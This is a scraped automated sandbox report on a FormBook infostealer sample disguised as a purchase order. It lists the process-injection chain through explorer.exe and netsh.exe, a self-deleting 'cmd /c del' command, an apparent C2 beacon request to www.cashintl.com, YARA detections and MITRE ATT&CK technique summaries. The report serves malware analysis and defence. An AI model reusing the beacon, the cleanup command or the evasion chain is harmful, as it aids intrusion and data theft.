65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title n

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49748	54.208.77.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:24:02.764219999 CET	4645	OUT	GET /igqu/?JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.cashintl.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:24:02.868865013 CET	4646	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Date: Sat, 21 Nov 2020 08:24:02 GMT Location: https://www.afternic.com/forsale/cashintl.com?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl Server: nginx/1.16.1 Content-Length: 293 Connection: Close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 66 74 65 72 6e 69 63 2e 63 6f 6d 2f 66 6f 72 73 61 6c 65 2f 63 61 73 68 69 6e 74 6c 2e 63 6f 6d 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 44 41 53 4c 4e 43 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 74 72 61 66 66 69 63 5f 74 79 70 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 74 72 61 66 66 69 63 5f 69 64 3d 64 61 73 6c 6e 63 26 61 6d 70 3b 4a 42 5a 30 6e 48 53 3d 50 57 70 4a 59 67 73 59 39 4c 6b 36 44 52 77 50 49 58 38 63 76 36 4b 68 58 6d 79 62 44 46 50 59 34 4d 55 36 39 68 6e 63 71 6e 73 51 78 44 74 7a 79 32 63 79 33 52 2f 58 63 34 4e 2b 4f 55 38 34 45 2f 39 7a 26 61 6d 70 3b 42 5a 3d 45 32 4a 38 59 6a 2d 30 5f 4a 6c 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.afternic.com/forsale/cashintl.com?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl">Found</a>.

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: Purchase Order 40,7045.exe PID: 6916 Parent PID: 5644

General

Start time:	09:22:28
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\Purchase Order 40,7045.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Purchase Order 40,7045.exe'
Imagebase:	0x7ffb73670000
File size:	347136 bytes
MD5 hash:	2566AAC2FAF57E27D8778F2C61BAC6D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: Purchase Order 40,7045.exe PID: 6932 Parent PID: 6916

General

Start time:	09:22:29
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\Purchase Order 40,7045.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Purchase Order 40,7045.exe
Imagebase:	0x7ffb73670000
File size:	347136 bytes
MD5 hash:	2566AAC2FAF57E27D8778F2C61BAC6D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3388 Parent PID: 6932

General

Start time:	09:22:33
Start date:	21/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: netsh.exe PID: 6984 Parent PID: 3388

General

Start time:	09:22:40
Start date:	21/11/2020
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\netsh.exe
Imagebase:	0xd90000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cmd.exe PID: 5700 Parent PID: 6984

General

Start time:	09:22:46
Start date:	21/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Purchase Order 40,7045.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6096 Parent PID: 5700

General

Start time:	09:22:46
Start date:	21/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Purchase Order 40,7045.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph